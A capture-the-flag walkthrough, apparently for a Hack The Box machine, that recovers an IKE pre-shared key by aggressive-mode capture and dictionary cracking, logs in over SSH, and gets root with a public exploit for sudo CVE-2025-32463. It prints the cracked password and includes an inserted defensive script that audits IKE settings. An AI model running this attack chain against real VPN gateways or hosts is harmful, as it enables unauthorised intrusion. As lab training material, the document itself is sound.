Enum
First, port scanning.

❯ nmap -sCV -T4 10.10.11.87
Starting Nmap 7.98 ( https://nmap.org ) at 2025-12-07 18:58 +0700
Nmap scan report for expressway.htb (10.10.11.87)
Host is up (0.061s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 10.0p2 Debian 8 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Only port 22 (SSH) seems to be open over TCP, so I rescanned using UDP.
❯ sudo nmap -sU -p- --top-ports 200 10.10.11.87
Starting Nmap 7.98 ( https://nmap.org ) at 2025-12-07 18:59 +0700
PORT     STATE         SERVICE
68/udp   open|filtered dhcpc
69/udp   open|filtered tftp
500/udp  open          isakmp
4500/udp open|filtered nat-t-ike

It looks like port 500 (isakmp) is open.
Foothold
Using ike-scan to probe the IKE responder.

❯ sudo ike-scan -M 10.10.11.87
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87	Main Mode Handshake returned
	HDR=(CKY-R=37311a644b96bf83)
	SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
	VID=09002689dfd6b712 (XAUTH)
	VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)

Ending ike-scan 1.9.6: 1 hosts scanned in 0.084 seconds (11.94 hosts/sec). 1 returned handshake; 0 returned notify

Try using aggressive mode.
❯ sudo ike-scan -M -A 10.10.11.87
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87	Aggressive Mode Handshake returned
	HDR=(CKY-R=7758f632446e0796)
	SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
	KeyExchange(128 bytes)
	Nonce(32 bytes)
	ID(Type=ID_USER_FQDN, Value=ike@expressway.htb)
	VID=09002689dfd6b712 (XAUTH)
	VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
	Hash(20 bytes)

Ending ike-scan 1.9.6: 1 hosts scanned in 0.110 seconds (9.07 hosts/sec). 1 returned handshake; 0 returned notify

The aggressive mode response discloses an ID of ike@expressway.htb.
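As an added example (not part of the original writeup), here is a small audit helper that parses ike-scan handshake lines like the ones above and flags what they reveal from a defender's point of view: aggressive mode combined with PSK authentication (which is what exposes the PSK-derived hash to an unauthenticated peer), the 3DES/SHA1/modp1024 proposal, and the identity disclosure. The two sample lines are the handshakes from this scan embedded as constructed input, and the weak-algorithm sets are my own assumed policy thresholds.

```python
import re

# Constructed sample input: the two handshake lines ike-scan printed above,
# each flattened onto one line (the form ike-scan -M uses per handshake).
MAIN_SAMPLE = (
    "10.10.11.87 Main Mode Handshake returned HDR=(CKY-R=37311a644b96bf83) "
    "SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds "
    "LifeDuration=28800) VID=09002689dfd6b712 (XAUTH)"
)
AGGR_SAMPLE = (
    "10.10.11.87 Aggressive Mode Handshake returned HDR=(CKY-R=7758f632446e0796) "
    "SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds "
    "LifeDuration=28800) KeyExchange(128 bytes) Nonce(32 bytes) "
    "ID(Type=ID_USER_FQDN, Value=ike@expressway.htb) VID=09002689dfd6b712 (XAUTH)"
)

# Assumed policy thresholds (adjust to your own baseline).
WEAK_ENC = {"DES", "3DES"}
WEAK_HASH = {"MD5", "SHA1"}
WEAK_GROUPS = {"1", "2", "5"}  # modp768, modp1024, modp1536

def parse_handshake(line):
    """Parse one ike-scan handshake line; return None if the line is not one."""
    head = re.match(r"(\S+)\s+(Main|Aggressive) Mode Handshake returned", line)
    sa = re.search(r"SA=\(([^)]*)\)", line)
    if not head or not sa:
        return None
    attrs = dict(kv.split("=", 1) for kv in sa.group(1).split())
    ident = re.search(r"ID\(Type=(\w+), Value=([^)]+)\)", line)
    return {"host": head.group(1), "mode": head.group(2), "sa": attrs,
            "id": ident.group(2) if ident else None}

def audit(line):
    """Return the list of findings for one handshake line (empty if none)."""
    hs = parse_handshake(line)
    if hs is None:
        return []
    sa, findings = hs["sa"], []
    if hs["mode"] == "Aggressive" and sa.get("Auth") == "PSK":
        # PSK-derived hash is sent before the peer is authenticated.
        findings.append("aggressive-mode-psk")
    if sa.get("Enc") in WEAK_ENC:
        findings.append("weak-enc:" + sa["Enc"])
    if sa.get("Hash") in WEAK_HASH:
        findings.append("weak-hash:" + sa["Hash"])
    if sa.get("Group", "").split(":")[0] in WEAK_GROUPS:
        findings.append("weak-group:" + sa["Group"])
    if hs["id"]:
        findings.append("id-disclosed:" + hs["id"])
    return findings
```

Feed it the handshake lines from a scan of your own gateway and treat any "aggressive-mode-psk" finding as a configuration to fix (disable aggressive mode or move to certificate/IKEv2 authentication).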
Extract the PSK hash with ike-scan's --pskcrack option.

❯ sudo ike-scan -M -A 10.10.11.87 --pskcrack=output.txt

Now brute-force the hash using hashcat, psk-crack or john, with rockyou.txt as the wordlist.
❯ psk-crack -d /usr/share/dict/rockyou.txt output.txt
Starting psk-crack [ike-scan 1.9.6] (http://www.nta-monitor.com/tools/ike-scan/)
Running in dictionary cracking mode
key "freakingrockstarontheroad" matches SHA1 hash c1dd8393403ec99db7270e5d49def7c1659dace9
Ending psk-crack: 8045039 iterations in 46.258 seconds (173915.12 iterations/sec)

Now we have SSH credentials: the username is ike@expressway.htb and the password is freakingrockstarontheroad. Try to log in.

ike@expressway:~$ ls
user.txt
ike@expressway:~$ cat user.txt
ike@expressway:~$

Privilege Escalation
First, run sudo -l.

ike@expressway:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

For security reasons, the password you type will not be visible.

Password:
Sorry, try again.

This looks like a custom sudo. Let's check where the sudo binary is located.
ike@expressway:~$ which sudo
/usr/local/bin/sudo
ike@expressway:~$

This is not the default sudo location.

ike@expressway:~$ sudo --version
Sudo version 1.9.17
Sudoers policy plugin version 1.9.17
Sudoers file grammar version 50
Sudoers I/O plugin version 1.9.17
Sudoers audit plugin version 1.9.17

Searching for public exploits against this version.
The search turns up CVE-2025-32463.
Using this exploit: https://github.com/kh4sh3i/CVE-2025-32463
Copy it onto the machine using SCP.

❯ scp exploit.sh ike@expressway.htb:/tmp
ike@expressway.htb's password:
exploit.sh

Back on the machine, run id first to check the current user, then run the exploit.

ike@expressway:/tmp$ id
uid=1001(ike) gid=1001(ike) groups=1001(ike),13(proxy)
ike@expressway:/tmp$ ./exploit.sh
woot!
root@expressway:/# id
uid=0(root) gid=0(root) groups=0(root),13(proxy),1001(ike)

Pwned.
root@expressway:/# cat /root/root.txt